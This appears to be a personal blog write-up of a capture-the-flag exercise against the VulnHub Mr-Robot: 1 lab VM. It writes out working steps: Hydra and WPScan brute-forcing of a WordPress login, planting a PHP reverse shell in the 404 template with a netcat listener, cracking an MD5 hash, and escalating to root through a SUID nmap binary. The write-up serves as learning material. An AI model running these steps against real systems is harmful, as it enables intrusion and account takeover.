Hello world! Today I'll be detailing the steps I took to hack VulnHub's Mr-Robot: 1 VM, created by Leon Johnson. The VM has three keys hidden in different locations and my goal is to find all three.
Configuration
I'll be using a Kali Linux VM to attack Mr-Robot: 1, which we will refer to as "target" throughout the write-up. Both machines are set up on Oracle VM VirtualBox and their networks are set to the Host Only Network.
Let's start hacking!
Where is Key 1?
First we will need to do a little reconnaissance, so let's start with figuring out our target's IP address.
To do that, we'll check my Kali machine's address using the command ip address.
With our IP, 192.168.56.104 perform a network scan and check the full range of IP's for our target address with the following command:
nmap -oX nmap_scan.xml 192.168.56.0/24
After a quick check of each IP on the nmap report, we see our target is on 192.168.56.103:
Enumeration
There are tools like dirb that we can use to recon any potential subdirectories of the main host address, but this method was exhaustive and can take some time. To be efficient with our time, let's manually check some common subdirectories and see if we can get a lead:
Possible there might be instructions on 192.168.56.103/readme...
...rude that it's not willing to help us with the hack.
How about 192.168.56.103/license...
...ummm, language.
Could see if it's a WordPress (WP) site with 192.168.56.103/wp-login...
...looks like we got ourselves a WP site. Let's try the default admin & password attack, see if we can get in.
...hmmm, doesn't look like we can get in. Noting the error message, it's prompted because of invalid username. So if we enter the correct username, would it prompt us with “Invalid password” instead? 👀
We'll circle back to the WP login later...
What about 192.168.56.103/robot.txt, which is a file used for site indexing...
...and luckily enough, there's key-1-of-3.txt, our 1st key! ✅
Where is Key 2?
As we saw earlier, there is a WP site we can try logging into, but of course, can't login without the right username & password.
Using WPScan, we can try to find any valid users:
wpscan --url http://192.168.56.103/wp-login.php —enumerate u
...but from the looks of it, nothing substantial, except maybe the WordPress version, which seems exploitable.
There was that fsocity.dic file we found earlier, maybe there's a lead there? A quick cat it seems to be a long list of "random" words...
...that we can use for possible username and password combinations!
Brute forcing username & password
There are a few tools that we can use to brute force the WP login:
Now remember that word list fsocity.dic? Yeah, that one file has 858,160 words...
...and if we use fsocity.dic as a wordlist for the cracking tool parameters, it's going to take a long while to brute force 858,160 potential username/password combos.
If we remove any duplicates and sort the wordlist, we could optimize the time it would take to brute force (TL;DR: shorter list, faster time to crack):
type fsocity.dic | sort | uniq > sorted_uniq_fsocity.txt
With that one command, we were able to reduce the word count to 11,452. Now to get crackin'!
Burp Suite
Using Burp Suite, we can configure the attack to use fsocity.dic as the word list parameter to brute force the username.
Looking at the length of each response, most are pretty consistent when erroring out, but scrolling not too far down to Elliot, we see the response is 4164 instead of the usual 4114. In the Rendered response, we see that the error message shows that the password entered for Elliot is incorrect, which from our previous observation about error messages us to conclude that Elliot is a valid user.
If we used the sorted list, it ideally would've shortened the brute force time execution. However, because it’s also sorted it could take longer to see the target response, especially if the right credential is last on the word list.
Considering how long it might take to use Burp Suite to brute force the password (since this is a Community version of Burp), we’ll move on with another tool, Hydra.
Hydra
Using Hydra, we're able to brute force a valid login, when using the original fsocity.dic and an arbitrary password test:
hydra -V -L ./fsocity.dic -p test 192.168.56.103 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F192.168.56.103%2Fwp-admin%2F&testcookie=1:Invalid username"
Again, it was fairly quick since the username Elliot was right near the top. But if we were to used the sorted, unique version of fsocity.dic, it would've taken up to attempt 5,488 of 11,452 in order to get the username:
After username, now we can brute force the password with username elliot, and here we'll use our duplicate-removed and sorted version of our wordlist sorted_uniq_fsocity.dic:
hydra -V -l elliot -P ./sorted_uniq_fsocity.dic 192.168.56.103 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F192.168.56.103%2Fwp-admin%2F&testcookie=1:incorrect"
WPScan
Note, with WPScan, since we were unable to enumerate any valid users with our preliminary scan, we'll have to rely on the previously mentioned tools (Burp & Hydra) to find the username first.
Once found, we can then use WPScan as an alternative to brute force the password like so:
wpscan -t 10000 -U Elliot -P fsocity.dic --url http://192.168.56.103/
So of the three tools, Hydra was most ideal with its quick execution time with this particular machine config. If circumstances were different, maybe users were enumerated or we were using the full Burp Suite version, the other tools would've been better for the job.
username: Elliot
password: ER28-0652
Now that we have our valid credentials, let's login to the WP site!
Running reverse shell on target
Our next moves are going to see if we can run reverse shell from pentestmonkey by inserting it into the 404.php file of the WP site.
Will need to switch network back to Bridge Adapter in order to download the reverse shell, and then switch back to Host Only Adapter to reconnect with the target.
To download the reverse shell onto Kali machine:
wget "http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz"
Extract it, then go into php-reverse-shell.php file using vim and replace the $ip value with your attacking machine IP: 192.168.56.104. And change the port to a “cool” number: 4242
Copy the php-reverse-shell.php code and paste it into Appearance > Editor > 404 Template and update the file.
Using NetCat, we set up a listener on port 4242 with command: nc -lnvp 4242
Open new terminal:
curl -X POST http://192.168.56.103/404.php
# This will send a POST request to the 404.php page
Can also send a POST request on web browser → http://102.168.56.103/flaskdjhflakjsdhf. This will trigger a 404 page, and therefore request will trigger the reverse shell.
Bam, we have our reverse shell!
Now we want to have interactive control over the target, so let's run bin/bash
python -c "import pty; pty.spawn('/bin/bash')"
Enumeration
Now that we have our "shell in a shell", let's see what we can literally "find" the 2nd key, assuming it is in the same format as the 1st one:
find / -name "key-2-of-3.txt"
Look like we got a hit on the key: /home/robot/key-2-of-3.txt
We navigate to our target directory /home/robot. Once there, we do an ls -l and confirm the 2nd key. Then we try to cat it to double check, but looks like our current privileges don’t allow us to access said file.
Looks like it can only be accessed by the robot user, but we don’t have a password. We do have a password.raw-md5 file that appears to be accessible to our current access level.
If we cat it, it looks like an md5 hash, which was obviously not hinted at by the file name raw-md5 👀.
So let’s see if we can decrypt it by sending it to our good friend the CrackStation.
Considering the context clues of the password.raw-md5 file and its contents, we've just found the password to the robot user.
Note, that if we weren't already running a PTY terminal, we'll need to run python -c "import pty; pty.spawn('/bin/bash')" in order to execute the su robot commmand:
So after a quick su robot and authorization with our decrypted credentials, we are able to cat the key-2-of-3.txt file and obtain the 2nd key! ✅
Where is Key 3?
Thinking of next steps, logically it would make sense to escalate permissions either up or across to other users who have access to files that we don't have access to (aka escalated to robot when we were daemon@linux in the shell). We'll need to find any files with the SUID permission set that we can exploit.
We can run the following to do just that:
find / -perm /4000 -type f 2>/tmp/2
Hmmm, looking at the files with SUID set...passwd seems like a potential lead…
Interesting, why would WP have an nmap directory? 👀
Exploit/escalate permissions to root
On GTFOBins it looks like nmap is a Unix binary we can exploit to escalate our privileges. As detailed on the repo, we'll need to run the following commands to spawn an interactive system shell:
nmap --interactive
!sh
Run whoami to confirm root privileges.
Navigate to /root, do a quick ls and there is key-3-of-3.txt, our final key! ✅
Conclusion
Overall, this was a fun challenge for my first exercise in cybersecurity. I was focused on exploring different approaches to find each key, so I can be more aware of my toolkit and future methodology. It was definitely not quick to finish the CTF, but I learned a lot in doing so.
Until the next time, happy hacking! ✌🏻
Top comments (0)